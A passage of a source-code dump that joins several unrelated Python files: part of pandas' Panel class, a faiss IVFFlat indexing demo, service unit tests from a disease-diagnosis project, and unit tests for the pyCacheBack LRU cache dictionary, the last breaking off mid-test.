return self._construct_return_type(new_data)
def groupby(self, function, axis='major'):
"""
Group data on given axis, returning GroupBy object.
Parameters
----------
function : callable
Mapping function for chosen access
axis : {'major', 'minor', 'items'}, default 'major'
Returns
-------
grouped : PanelGroupBy
"""
from pandas.core.groupby import PanelGroupBy
axis = self._get_axis_number(axis)
return PanelGroupBy(self, function, axis=axis)
def to_frame(self, filter_observations=True):
"""
Transform wide format into long (stacked) format as DataFrame whose
columns are the Panel's items and whose index is a MultiIndex formed
of the Panel's major and minor axes.
Parameters
----------
filter_observations : boolean, default True
Drop (major, minor) pairs without a complete set of observations
across all the items
Returns
-------
y : DataFrame
"""
_, N, K = self.shape
if filter_observations:
# shaped like the return DataFrame
mask = notna(self.values).all(axis=0)
# size = mask.sum()
selector = mask.ravel()
else:
# size = N * K
selector = slice(None, None)
data = {item: self[item].values.ravel()[selector]
for item in self.items}
def construct_multi_parts(idx, n_repeat, n_shuffle=1):
# Replicates and shuffles MultiIndex, returns individual attributes
codes = [np.repeat(x, n_repeat) for x in idx.codes]
# Assumes that each label is divisible by n_shuffle
codes = [x.reshape(n_shuffle, -1).ravel(order='F')
for x in codes]
codes = [x[selector] for x in codes]
levels = idx.levels
names = idx.names
return codes, levels, names
def construct_index_parts(idx, major=True):
levels = [idx]
if major:
codes = [np.arange(N).repeat(K)[selector]]
names = idx.name or 'major'
else:
codes = np.arange(K).reshape(1, K)[np.zeros(N, dtype=int)]
codes = [codes.ravel()[selector]]
names = idx.name or 'minor'
names = [names]
return codes, levels, names
if isinstance(self.major_axis, MultiIndex):
major_codes, major_levels, major_names = construct_multi_parts(
self.major_axis, n_repeat=K)
else:
major_codes, major_levels, major_names = construct_index_parts(
self.major_axis)
if isinstance(self.minor_axis, MultiIndex):
minor_codes, minor_levels, minor_names = construct_multi_parts(
self.minor_axis, n_repeat=N, n_shuffle=K)
else:
minor_codes, minor_levels, minor_names = construct_index_parts(
self.minor_axis, major=False)
levels = major_levels + minor_levels
codes = major_codes + minor_codes
names = major_names + minor_names
index = MultiIndex(levels=levels, codes=codes, names=names,
verify_integrity=False)
return DataFrame(data, index=index, columns=self.items)
def apply(self, func, axis='major', **kwargs):
"""
Applies function along axis (or axes) of the Panel.
Parameters
----------
func : function
Function to apply to each combination of 'other' axes
e.g. if axis = 'items', the combination of major_axis/minor_axis
will each be passed as a Series; if axis = ('items', 'major'),
DataFrames of items & major axis will be passed
axis : {'items', 'minor', 'major'}, or {0, 1, 2}, or a tuple with two
axes
Additional keyword arguments will be passed as keywords to the function
Returns
-------
result : Panel, DataFrame, or Series
Examples
--------
Returns a Panel with the square root of each element
>>> p = pd.Panel(np.random.rand(4, 3, 2)) # doctest: +SKIP
>>> p.apply(np.sqrt)
Equivalent to p.sum(1), returning a DataFrame
>>> p.apply(lambda x: x.sum(), axis=1) # doctest: +SKIP
Equivalent to previous:
>>> p.apply(lambda x: x.sum(), axis='major') # doctest: +SKIP
Return the shapes of each DataFrame over axis 2 (i.e the shapes of
items x major), as a Series
>>> p.apply(lambda x: x.shape, axis=(0,1)) # doctest: +SKIP
"""
if kwargs and not isinstance(func, np.ufunc):
f = lambda x: func(x, **kwargs)
else:
f = func
# 2d-slabs
if isinstance(axis, (tuple, list)) and len(axis) == 2:
return self._apply_2d(f, axis=axis)
axis = self._get_axis_number(axis)
# try ufunc like
if isinstance(f, np.ufunc):
try:
with np.errstate(all='ignore'):
result = np.apply_along_axis(func, axis, self.values)
return self._wrap_result(result, axis=axis)
except (AttributeError):
pass
# 1d
return self._apply_1d(f, axis=axis)
def _apply_1d(self, func, axis):
axis_name = self._get_axis_name(axis)
ndim = self.ndim
values = self.values
# iter thru the axes
slice_axis = self._get_axis(axis)
slice_indexer = [0] * (ndim - 1)
indexer = np.zeros(ndim, 'O')
indlist = list(range(ndim))
indlist.remove(axis)
indexer[axis] = slice(None, None)
indexer.put(indlist, slice_indexer)
planes = [self._get_axis(axi) for axi in indlist]
shape = np.array(self.shape).take(indlist)
# all the iteration points
points = cartesian_product(planes)
results = []
for i in range(np.prod(shape)):
# construct the object
pts = tuple(p[i] for p in points)
indexer.put(indlist, slice_indexer)
obj = Series(values[tuple(indexer)], index=slice_axis, name=pts)
result = func(obj)
results.append(result)
# increment the indexer
slice_indexer[-1] += 1
n = -1
while (slice_indexer[n] >= shape[n]) and (n > (1 - ndim)):
slice_indexer[n - 1] += 1
slice_indexer[n] = 0
n -= 1
# empty object
if not len(results):
return self._constructor(**self._construct_axes_dict())
# same ndim as current
if isinstance(results[0], Series):
arr = np.vstack([r.values for r in results])
arr = arr.T.reshape(tuple([len(slice_axis)] + list(shape)))
tranp = np.array([axis] + indlist).argsort()
arr = arr.transpose(tuple(list(tranp)))
return self._constructor(arr, **self._construct_axes_dict())
# ndim-1 shape
results = np.array(results).reshape(shape)
if results.ndim == 2 and axis_name != self._info_axis_name:
results = results.T
planes = planes[::-1]
return self._construct_return_type(results, planes)
def _apply_2d(self, func, axis):
"""
Handle 2-d slices, equiv to iterating over the other axis.
"""
ndim = self.ndim
axis = [self._get_axis_number(a) for a in axis]
# construct slabs, in 2-d this is a DataFrame result
indexer_axis = list(range(ndim))
for a in axis:
indexer_axis.remove(a)
indexer_axis = indexer_axis[0]
slicer = [slice(None, None)] * ndim
ax = self._get_axis(indexer_axis)
results = []
for i, e in enumerate(ax):
slicer[indexer_axis] = i
sliced = self.iloc[tuple(slicer)]
obj = func(sliced)
results.append((e, obj))
return self._construct_return_type(dict(results))
def _reduce(self, op, name, axis=0, skipna=True, numeric_only=None,
filter_type=None, **kwds):
if numeric_only:
raise NotImplementedError('Panel.{0} does not implement '
'numeric_only.'.format(name))
if axis is None and filter_type == 'bool':
# labels = None
# constructor = None
axis_number = None
axis_name = None
else:
# TODO: Make other agg func handle axis=None properly
axis = self._get_axis_number(axis)
# labels = self._get_agg_axis(axis)
# constructor = self._constructor
axis_name = self._get_axis_name(axis)
axis_number = self._get_axis_number(axis_name)
f = lambda x: op(x, axis=axis_number, skipna=skipna, **kwds)
with np.errstate(all='ignore'):
result = f(self.values)
if axis is None and filter_type == 'bool':
return np.bool_(result)
axes = self._get_plane_axes(axis_name)
if result.ndim == 2 and axis_name != self._info_axis_name:
result = result.T
return self._construct_return_type(result, axes)
def _construct_return_type(self, result, axes=None):
"""
Return the type for the ndim of the result.
"""
ndim = getattr(result, 'ndim', None)
# need to assume they are the same
if ndim is None:
if isinstance(result, dict):
ndim = getattr(list(compat.itervalues(result))[0], 'ndim', 0)
# have a dict, so top-level is +1 dim
if ndim != 0:
ndim += 1
# scalar
if ndim == 0:
return Series(result)
# same as self
elif self.ndim == ndim:
# return the construction dictionary for these axes
if axes is None:
return self._constructor(result)
return self._constructor(result, **self._construct_axes_dict())
# sliced
elif self.ndim == ndim + 1:
if axes is None:
return self._constructor_sliced(result)
return self._constructor_sliced(
result, **self._extract_axes_for_slice(self, axes))
raise ValueError('invalid _construct_return_type [self->{self}] '
'[result->{result}]'.format(self=self, result=result))
def _wrap_result(self, result, axis):
axis = self._get_axis_name(axis)
axes = self._get_plane_axes(axis)
if result.ndim == 2 and axis != self._info_axis_name:
result = result.T
return self._construct_return_type(result, axes)
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.reindex.__doc__)
def reindex(self, *args, **kwargs):
major = kwargs.pop("major", None)
minor = kwargs.pop('minor', None)
if major is not None:
if kwargs.get("major_axis"):
raise TypeError("Cannot specify both 'major' and 'major_axis'")
kwargs['major_axis'] = major
if minor is not None:
if kwargs.get("minor_axis"):
raise TypeError("Cannot specify both 'minor' and 'minor_axis'")
kwargs['minor_axis'] = minor
axes = validate_axis_style_args(self, args, kwargs, 'labels',
'reindex')
kwargs.update(axes)
kwargs.pop('axis', None)
kwargs.pop('labels', None)
with warnings.catch_warnings():
warnings.simplefilter("ignore", FutureWarning)
# do not warn about constructing Panel when reindexing
result = super(Panel, self).reindex(**kwargs)
return result
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.rename.__doc__)
def rename(self, items=None, major_axis=None, minor_axis=None, **kwargs):
major_axis = (major_axis if major_axis is not None else
kwargs.pop('major', None))
minor_axis = (minor_axis if minor_axis is not None else
kwargs.pop('minor', None))
return super(Panel, self).rename(items=items, major_axis=major_axis,
minor_axis=minor_axis, **kwargs)
@Appender(_shared_docs['reindex_axis'] % _shared_doc_kwargs)
def reindex_axis(self, labels, axis=0, method=None, level=None, copy=True,
limit=None, fill_value=np.nan):
return super(Panel, self).reindex_axis(labels=labels, axis=axis,
method=method, level=level,
copy=copy, limit=limit,
fill_value=fill_value)
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.transpose.__doc__)
def transpose(self, *args, **kwargs):
# check if a list of axes was passed in instead as a
# single *args element
if (len(args) == 1 and hasattr(args[0], '__iter__') and
not is_string_like(args[0])):
axes = args[0]
else:
axes = args
if 'axes' in kwargs and axes:
raise TypeError("transpose() got multiple values for "
"keyword argument 'axes'")
elif not axes:
axes = kwargs.pop('axes', ())
return super(Panel, self).transpose(*axes, **kwargs)
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.fillna.__doc__)
def fillna(self, value=None, method=None, axis=None, inplace=False,
limit=None, downcast=None, **kwargs):
return super(Panel, self).fillna(value=value, method=method, axis=axis,
inplace=inplace, limit=limit,
downcast=downcast, **kwargs)
def count(self, axis='major'):
"""
Return number of observations over requested axis.
Parameters
----------
axis : {'items', 'major', 'minor'} or {0, 1, 2}
Returns
-------
count : DataFrame
"""
i = self._get_axis_number(axis)
values = self.values
mask = np.isfinite(values)
result = mask.sum(axis=i, dtype='int64')
return self._wrap_result(result, axis)
def shift(self, periods=1, freq=None, axis='major'):
"""
Shift index by desired number of periods with an optional time freq.
The shifted data will not include the dropped periods and the
shifted axis will be smaller than the original. This is different
from the behavior of DataFrame.shift()
Parameters
----------
periods : int
Number of periods to move, can be positive or negative
freq : DateOffset, timedelta, or time rule string, optional
axis : {'items', 'major', 'minor'} or {0, 1, 2}
Returns
-------
shifted : Panel
"""
if freq:
return self.tshift(periods, freq, axis=axis)
return super(Panel, self).slice_shift(periods, axis=axis)
def tshift(self, periods=1, freq=None, axis='major'):
return super(Panel, self).tshift(periods, freq, axis)
def join(self, other, how='left', lsuffix='', rsuffix=''):
"""
Join items with other Panel either on major and minor axes column.
Parameters
----------
other : Panel or list of Panels
Index should be similar to one of the columns in this one
how : {'left', 'right', 'outer', 'inner'}
How to handle indexes of the two objects. Default: 'left'
for joining on index, None otherwise
* left: use calling frame's index
* right: use input frame's index
* outer: form union of indexes
* inner: use intersection of indexes
lsuffix : string
Suffix to use from left frame's overlapping columns
rsuffix : string
Suffix to use from right frame's overlapping columns
Returns
-------
joined : Panel
"""
from pandas.core.reshape.concat import concat
if isinstance(other, Panel):
join_major, join_minor = self._get_join_index(other, how)
this = self.reindex(major=join_major, minor=join_minor)
other = other.reindex(major=join_major, minor=join_minor)
merged_data = this._data.merge(other._data, lsuffix, rsuffix)
return self._constructor(merged_data)
else:
if lsuffix or rsuffix:
raise ValueError('Suffixes not supported when passing '
'multiple panels')
if how == 'left':
how = 'outer'
join_axes = [self.major_axis, self.minor_axis]
elif how == 'right':
raise ValueError('Right join not supported with multiple '
'panels')
else:
join_axes = None
return concat([self] + list(other), axis=0, join=how,
join_axes=join_axes, verify_integrity=True)
@deprecate_kwarg(old_arg_name='raise_conflict', new_arg_name='errors',
mapping={False: 'ignore', True: 'raise'})
def update(self, other, join='left', overwrite=True, filter_func=None,
errors='ignore'):
"""
Modify Panel in place using non-NA values from other Panel.
May also use object coercible to Panel. Will align on items.
Parameters
----------
other : Panel, or object coercible to Panel
The object from which the caller will be udpated.
join : {'left', 'right', 'outer', 'inner'}, default 'left'
How individual DataFrames are joined.
overwrite : bool, default True
If True then overwrite values for common keys in the calling Panel.
filter_func : callable(1d-array) -> 1d-array<bool>, default None
Can choose to replace values other than NA. Return True for values
that should be updated.
errors : {'raise', 'ignore'}, default 'ignore'
If 'raise', will raise an error if a DataFrame and other both.
.. versionchanged :: 0.24.0
Changed from `raise_conflict=False|True`
to `errors='ignore'|'raise'`.
See Also
--------
DataFrame.update : Similar method for DataFrames.
dict.update : Similar method for dictionaries.
"""
if not isinstance(other, self._constructor):
other = self._constructor(other)
axis_name = self._info_axis_name
axis_values = self._info_axis
other = other.reindex(**{axis_name: axis_values})
for frame in axis_values:
self[frame].update(other[frame], join=join, overwrite=overwrite,
filter_func=filter_func, errors=errors)
def _get_join_index(self, other, how):
if how == 'left':
join_major, join_minor = self.major_axis, self.minor_axis
elif how == 'right':
join_major, join_minor = other.major_axis, other.minor_axis
elif how == 'inner':
join_major = self.major_axis.intersection(other.major_axis)
join_minor = self.minor_axis.intersection(other.minor_axis)
elif how == 'outer':
join_major = self.major_axis.union(other.major_axis)
join_minor = self.minor_axis.union(other.minor_axis)
return join_major, join_minor
# miscellaneous data creation
@staticmethod
def _extract_axes(self, data, axes, **kwargs):
"""
Return a list of the axis indices.
"""
return [self._extract_axis(self, data, axis=i, **kwargs)
for i, a in enumerate(axes)]
@staticmethod
def _extract_axes_for_slice(self, axes):
"""
Return the slice dictionary for these axes.
"""
return {self._AXIS_SLICEMAP[i]: a for i, a in
zip(self._AXIS_ORDERS[self._AXIS_LEN - len(axes):], axes)}
@staticmethod
def _prep_ndarray(self, values, copy=True):
if not isinstance(values, np.ndarray):
values = np.asarray(values)
# NumPy strings are a pain, convert to object
if issubclass(values.dtype.type, compat.string_types):
values = np.array(values, dtype=object, copy=True)
else:
if copy:
values = values.copy()
if values.ndim != self._AXIS_LEN:
raise ValueError("The number of dimensions required is {0}, "
"but the number of dimensions of the "
"ndarray given was {1}".format(self._AXIS_LEN,
values.ndim))
return values
@staticmethod
def _homogenize_dict(self, frames, intersect=True, dtype=None):
"""
Conform set of _constructor_sliced-like objects to either
an intersection of indices / columns or a union.
Parameters
----------
frames : dict
intersect : boolean, default True
Returns
-------
dict of aligned results & indices
"""
result = dict()
# caller differs dict/ODict, preserved type
if isinstance(frames, OrderedDict):
result = OrderedDict()
adj_frames = OrderedDict()
for k, v in compat.iteritems(frames):
if isinstance(v, dict):
adj_frames[k] = self._constructor_sliced(v)
else:
adj_frames[k] = v
axes = self._AXIS_ORDERS[1:]
axes_dict = {a: ax for a, ax in zip(axes, self._extract_axes(
self, adj_frames, axes, intersect=intersect))}
reindex_dict = {self._AXIS_SLICEMAP[a]: axes_dict[a] for a in axes}
reindex_dict['copy'] = False
for key, frame in compat.iteritems(adj_frames):
if frame is not None:
result[key] = frame.reindex(**reindex_dict)
else:
result[key] = None
axes_dict['data'] = result
axes_dict['dtype'] = dtype
return axes_dict
@staticmethod
def _extract_axis(self, data, axis=0, intersect=False):
index = None
if len(data) == 0:
index = Index([])
elif len(data) > 0:
raw_lengths = []
have_raw_arrays = False
have_frames = False
for v in data.values():
if isinstance(v, self._constructor_sliced):
have_frames = True
elif v is not None:
have_raw_arrays = True
raw_lengths.append(v.shape[axis])
if have_frames:
# we want the "old" behavior here, of sorting only
# 1. we're doing a union (intersect=False)
# 2. the indices are not aligned.
index = _get_objs_combined_axis(data.values(), axis=axis,
intersect=intersect, sort=None)
if have_raw_arrays:
lengths = list(set(raw_lengths))
if len(lengths) > 1:
raise ValueError('ndarrays must match shape on '
'axis {ax}'.format(ax=axis))
if have_frames:
if lengths[0] != len(index):
raise AssertionError('Length of data and index must match')
else:
index = Index(np.arange(lengths[0]))
if index is None:
index = Index([])
return ensure_index(index)
def sort_values(self, *args, **kwargs):
"""
NOT IMPLEMENTED: do not call this method, as sorting values is not
supported for Panel objects and will raise an error.
"""
super(Panel, self).sort_values(*args, **kwargs)
Panel._setup_axes(axes=['items', 'major_axis', 'minor_axis'], info_axis=0,
stat_axis=1, aliases={'major': 'major_axis',
'minor': 'minor_axis'},
slicers={'major_axis': 'index',
'minor_axis': 'columns'},
docs={})
ops.add_special_arithmetic_methods(Panel)
ops.add_flex_arithmetic_methods(Panel)
Panel._add_numeric_operations()
| bsd-3-clause | -7,667,139,979,059,347,000 | 34.208438 | 79 | 0.545581 | false |
h-j-13/MyNote | Open Source/Faiss/faiss_learn/Demo/2-IVFFlat.py | 1 | 1309 | # encoding:utf-8
# Copyright (c) 2015-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD+Patents license found in the
# LICENSE file in the root directory of this source tree.
# author : Facebook
# translate : h-j-13
import numpy as np
d = 64 # 向量维度
nb = 100000 # 向量集大小
nq = 10000 # 查询次数
np.random.seed(1234) # 随机种子,使结果可复现
xb = np.random.random((nb, d)).astype('float32')
xb[:, 0] += np.arange(nb) / 1000.
xq = np.random.random((nq, d)).astype('float32')
xq[:, 0] += np.arange(nq) / 1000.
import faiss
nlist = 100
k = 4
quantizer = faiss.IndexFlatL2(d) # the other index
index = faiss.IndexIVFFlat(quantizer, d, nlist, faiss.METRIC_L2)
# here we specify METRIC_L2, by default it performs inner-product search
assert not index.is_trained
index.train(xb)
assert index.is_trained
index.add(xb) # 添加索引可能会有一点慢
D, I = index.search(xq, k) # 搜索
print(I[-5:]) # 最初五次查询的结果
index.nprobe = 10 # 默认 nprobe 是1 ,可以设置的大一些试试
D, I = index.search(xq, k)
print(I[-5:]) # 最后五次查询的结果 | gpl-3.0 | -9,143,578,694,520,731,000 | 29.153846 | 73 | 0.6 | false |
MuhammedHasan/disease-diagnosis | src/services/tests.py | 1 | 1461 | import unittest
import logging
from .solution_service import SolutionService
from .naming_service import NamingService
from .data_reader import DataReader
class TestSolutionService(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.logger = logging.getLogger('services')
cls.logger.setLevel(logging.INFO)
cls.logger.addHandler(logging.FileHandler('../logs/services.log'))
def setUp(self):
self.data = [{'acon_C_c': 1}, ]
self.service = SolutionService()
@unittest.skip('too long tests')
def test_get_solutions(self):
solutions = self.service.get_solutions(self.data)
self.assertNotEqual(len(solutions), 0)
self.assertNotEqual(len(solutions[0]), 0)
self.assertNotEqual(len(next(iter(solutions[0].values()))), 0)
class TestNamingService(unittest.TestCase):
def setUp(self):
self.service = NamingService('ecolin')
def test_to(self):
self.assertNotEqual(len(self.service._names), 0)
self.service._names = {'x': 'y'}
self.assertEqual(self.service.to('x'), 'y')
self.assertEqual(self.service.to('a'), None)
named = self.service.to({'x': 1, 'c': 1})
self.assertDictEqual(named, {'y': 1})
class TestDataReader(unittest.TestCase):
def setUp(self):
self.service = DataReader()
def test_solution_reader(self):
self.assertNotEqual(len(self.service.read_solutions()), 0)
| gpl-3.0 | -8,841,737,580,263,945,000 | 27.647059 | 74 | 0.657769 | false |
rzzzwilson/pyCacheBack | test_pycacheback.py | 1 | 14987 | #!/usr/bin/env python
"""
Test pycacheback
"""
import os
import shutil
import random
import copy
from pycacheback import pyCacheBack
import unittest
class TestpyCacheBack(unittest.TestCase):
def testSimple(self):
"""A simple 'smoke test' for the extended dictionary."""
# make an extended dictionary and define a key/value pair
a = pyCacheBack()
a[1] = 'one'
# make sure we can retrieve the pre-defined key/value pair
msg = "a[1] != 'one'!"
self.assertEqual(a[1], 'one', msg)
# make sure that accessing non-existant key raises KeyError
self.assertRaises(KeyError, a.__getitem__, 2)
# make sure the len() function works correctly
msg = 'len(a) should be 1, got %d!' % len(a)
self.assertEqual(len(a), 1, msg)
def testDict(self):
"""Test the basic dictionary methods that should still work."""
# make an extended dictionary and define some key/value pairs
a = pyCacheBack()
a[1] = 'one'
a[2] = '2'
a[3] = 3
a['4'] = 'four'
# check other dictionary methods
msg = 'len(a) should be 4, got %d!' % len(a)
self.assertEqual(len(a), 4, msg)
msg = "'1 in a' was False, should be True!"
self.assertTrue(1 in a, msg)
msg = "'\'4\' in a' was False, should be True!"
self.assertTrue('4' in a, msg)
b = a.copy()
msg = "a.copy() doesn't return a true copy'"
self.assertEqual(a, b, msg)
msg = "a.get(1) should return 'one', got %s" % a.get(1)
self.assertEqual(a.get(1), 'one', msg)
msg = ("a.get(10, 'NONE') should return 'NONE', got %s"
% str(a.get(10, 'NONE')))
self.assertEqual(a.get(10, 'NONE'), 'NONE', msg)
msg = "a.has_key(2) should return True, got %s" % str(2 in a)
self.assertTrue(2 in a, msg)
msg = ("a.has_key(10) should return False, got %s"
% str(10 in a))
self.assertFalse(10 in a, msg)
msg = ("a.items() should return [(1, 'one'), (2, '2'), (3, 3), "
"('4', 'four')], got %s" % str(a.items()))
self.assertEqual([(1, 'one'), (2, '2'), (3, 3), ('4', 'four')],
list(a.items()), msg)
msg = "a.keys() should return [1, 2, 3, '4'], got %s" % str(a.keys())
self.assertEqual([1, 2, 3, '4'], list(a.keys()), msg)
msg = "a.keys() should return [1, 2, 3, '4'], got %s" % str(a.keys())
self.assertEqual([1, 2, 3, '4'], list(a.keys()), msg)
msg = ("a.values() should return ['one', '2', 3, 'four'], got %s"
% str(a.values()))
self.assertEqual(['one', '2', 3, 'four'], list(a.values()), msg)
result = a.setdefault(10, 'TEN')
msg = "a.setdefault(10, 'TEN') doesn't return 'TEN'?"
self.assertEqual(result, 'TEN', msg)
msg = "a.setdefault() doesn't set the default?"
self.assertEqual(a[10], 'TEN', msg)
result = a.pop(10)
msg = "a.pop(10) should return 'TEN' but got %s?" % result
self.assertEqual(result, 'TEN', msg)
result = a.pop(10, 'not found')
msg = ("a.pop(10, 'not found') should return 'not found' but got %s?"
% result)
self.assertEqual(result, 'not found', msg)
#msg = "a.pop(10) should raise KeyError exception, but didn't?"
self.assertRaises(KeyError, a.pop, 10)
msg = "a.update(b) should set 'TEN' key but didn't"
b = {'TEN': 10}
a.update(b)
self.assertEqual(a['TEN'], 10, msg)
a.clear()
msg = 'After clear(), len(a) should be 0, got %d!' % len(a)
self.assertEqual(len(a), 0, msg)
b = {'TEN': 10}
a.update(b)
msg = "a.keys() should return ['TEN'], got %s" % str(a.keys())
self.assertEqual(list(a.keys()), ['TEN'], msg)
def testLRU(self):
"""Test the LRU mechanism."""
# make an extended dictionary, maxLRU is 2 for testing
a = pyCacheBack(max_lru=2)
# the LRU list should be empty when we start
msg = ("Initial LRU list should be empty, but it's %s"
% str(a._lru_list))
self.assertEqual(a._lru_list, [], msg)
# make sure the len() function works correctly
msg = "len(a) should be 0, got %d!" % len(a)
self.assertEqual(len(a), 0, msg)
# add a key/value pair, recheck LRU and length
a['test'] = 'test value'
msg = ("LRU list should be %s, but it's %s"
% (str(['test']), str(a._lru_list)))
self.assertEqual(a._lru_list, ['test'], msg)
msg = "len(a) should be 1, got %d!" % len(a)
self.assertEqual(len(a), 1, msg)
# add another key/value pair, recheck LRU
a['test2'] = 'another test value'
msg = ("LRU list should be %s, but it's %s"
% (str(['test2', 'test']), str(a._lru_list)))
self.assertEqual(a._lru_list, ['test2', 'test'], msg)
# access first key/value pair, check LRU changed
b = a['test']
msg = ("LRU list should be %s, but it's %s"
% (str(['test', 'test2']), str(a._lru_list)))
self.assertEqual(a._lru_list, ['test', 'test2'], msg)
# make sure the len() function works correctly
msg = "len(a) should be 2, got %d!" % len(a)
self.assertEqual(len(a), 2, msg)
# add third key/value pair, check LRU changed
a['test3'] = 100
msg = ("LRU list should be %s, but it's %s"
% (str(['test3', 'test']), str(a._lru_list)))
self.assertEqual(a._lru_list, ['test3', 'test'], msg)
# make sure the len() function works correctly (still 2)
msg = "len(a) should be 2, got %d!" % len(a)
self.assertEqual(len(a), 2, msg)
# delete first key/value pair, check LRU changed
del a['test']
msg = ("LRU list should be %s, but it's %s"
% (str(['test3']), str(a._lru_list)))
self.assertEqual(a._lru_list, ['test3'], msg)
# make sure the len() function works correctly
msg = "len(a) should be 1, got %d!" % len(a)
self.assertEqual(len(a), 1, msg)
def testBacking(self):
"""Test the backing mechanism. Keys will be (x, y) form."""
# create the test directory
test_dir = './_#test_dir#_'
shutil.rmtree(test_dir, ignore_errors=True)
os.mkdir(test_dir)
# override the backing functions in pyCacheBack
class my_cache(pyCacheBack):
def _put_to_back(self, key, value):
(x, y) = key
dir_path = os.path.join(self._backing_dir, str(x))
try:
os.mkdir(dir_path)
except OSError:
pass
file_path = os.path.join(dir_path, str(y))
with open(file_path, 'wb') as f:
f.write(bytes(value, encoding='utf-8'))
def _get_from_back(self, key):
(x, y) = key
file_path = os.path.join(self._backing_dir, str(x), str(y))
try:
with open(file_path, 'rb') as f:
value = f.read()
except IOError:
raise KeyError(str(key))
return value
# define utility testing function
def check_file(self, file_path, expected_contents):
if not os.path.isfile(file_path):
self.fail("File %s doesn't exist!?" % file_path)
with open(file_path, 'rb') as f:
file_contents = f.read().decode("utf-8")
if file_contents != expected_contents:
self.fail("Expected file contents '%s', got '%s'"
% (expected_contents, file_contents))
# OK, test it
a = my_cache(backing_dir=test_dir, max_lru=2)
a[(1,1)] = 'one and one'
a[(1,2)] = 'one and two'
a[(1,1)] = 'one and one, second value' # redefine (1,1) value
# test if backing files are as expected
check_file(self, os.path.join(test_dir, '1', '1'), a[(1,1)])
check_file(self, os.path.join(test_dir, '1', '2'), a[(1,2)])
# add third key, flushing (1,2), check backing file still there
a[(1,3)] = 'one, three'
check_file(self, os.path.join(test_dir, '1', '2'), a[(1,2)])
# check that we can still get (1,2) data from backing store
msg = "a[(1,2)] != 'one and two'!"
self.assertEqual(a[(1,2)], 'one and two', msg)
# delete a key, ensure gone & check backing file still there
del a[(1,3)]
check_file(self, os.path.join(test_dir, '1', '3'),
'one, three')
# clean up
shutil.rmtree(test_dir)
def testIter(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
for i, x in enumerate(iter(a)):
msg = "'%d'th key should be %d, got %s" % (i+1, kv_list[i][0], x)
self.assertEqual(kv_list[i][0], x, msg)
def testCopy(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
b = a.copy()
msg = 'Length of copied dict should be %d, got %d' % (len(a), len(b))
self.assertEqual(len(b), len(a), msg)
# change element of 'a', see if 'b' gets it
orig = b[2]
a[2] = 'test'
_ = a[3]
msg = "copy: b[2] should be %s, got %s" % (orig, str(b[2]))
self.assertEqual(b[2], orig, msg)
def testClear(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
msg = 'Length before should be %d, got %d' % (len(kv_list), len(a))
self.assertEqual(len(a), len(kv_list), msg)
a.clear()
msg = 'Length after should be 0, got %d' % len(a)
self.assertEqual(len(a), 0, msg)
# check LRU list is empty
msg = ".clear() didn't empty ._lru_list, it's '%s'" % str(a._lru_list)
self.assertEqual([], a._lru_list, msg)
def testGet(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
msg = (".get(1) should return '%s', got '%s'"
% (str(kv_list[1][0]), str(a.get(1))))
self.assertEqual(a.get(1), 'one', msg)
def testHasKey(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
msg = ".has_key(1) should return True, got '%s'" % str(1 in a) #a.has_key(1))
self.assertEqual(1 in a, True, msg)
msg = (".has_key(100) should return False, got '%s'"
% str(100 in a))
self.assertEqual(100 in a, False, msg)
self.assertEqual(1 in a, True, msg)
def testItems(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
expected = str(kv_list)
msg = (".items() should return '%s', got '%s'"
% (expected, str(a.items())))
self.assertEqual(expected, str(a.items()), msg)
def testItems(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
for i, x in enumerate(a.items()):
msg = (".iteritems() item %d should be '%s', got '%s'"
% (i, str(kv_list[i]), str(x)))
self.assertEqual(kv_list[i], x, msg)
def testItervalues(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
for i, x in enumerate(a.itervalues()):
msg = (".itervalues() item %d should be '%s', got '%s'"
% (i, str(kv_list[i][1]), str(x)))
self.assertEqual(kv_list[i][1], x, msg)
def testItervalues(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
k_list = [x[0] for x in kv_list]
msg = ".keys() should be '%s', got '%s'" % (str(k_list), str(a.keys()))
self.assertEqual(k_list, list(a.keys()), msg)
def testPop(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
random.shuffle(kv_list)
for (k, v) in kv_list:
_ = a[k]
expected_lru_len = len(a._lru_list)
for (k, v) in kv_list:
value = a.pop(k, None)
msg = (".pop(%s) should return '%s', got '%s'"
% (str(k), str(v), str(value)))
self.assertEqual(v, value, msg)
expected_lru_len = expected_lru_len - 1
msg = (".pop(%s) should leave dict with len(LRU)=%d, got %d"
% (str(k), expected_lru_len, len(a._lru_list)))
self.assertEqual(len(a._lru_list), expected_lru_len, msg)
def testPopitem(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
# get a big LRU list
shuffle_kv_list = copy.deepcopy(kv_list)
random.shuffle(shuffle_kv_list)
for (k, v) in shuffle_kv_list:
_ = a[k]
a_len = len(a)
lru_len = len(a._lru_list)
for i in range(a_len):
(k, v) = a.popitem()
msg = (".popitem() returned '%s', shouldn't be in dict?"
% str((k, v)))
self.assertIn((k, v), kv_list, msg)
msg = ".popitem() all done, len should be 0, got %d" % len(a)
self.assertEqual(len(a), 0, msg)
msg = (".popitem() all done, ._lru_list should be [], got '%s'"
% str(a._lru_list))
self.assertEqual(a._lru_list, [], msg)
def testSetdefault(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
ret_val = a.setdefault(100, True)
